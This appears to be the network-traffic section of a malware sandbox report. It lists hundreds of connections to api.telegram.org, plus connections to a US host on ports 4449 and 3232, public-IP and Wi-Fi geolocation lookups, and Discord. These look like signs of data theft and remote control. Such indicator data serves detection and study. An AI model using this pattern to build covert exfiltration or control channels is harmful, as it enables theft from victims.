| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 241.184.16.104.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | api.mylnikov.org | udp |
| US | 172.67.196.114:443 | api.mylnikov.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 114.196.67.172.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 172.67.196.114:443 | api.mylnikov.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
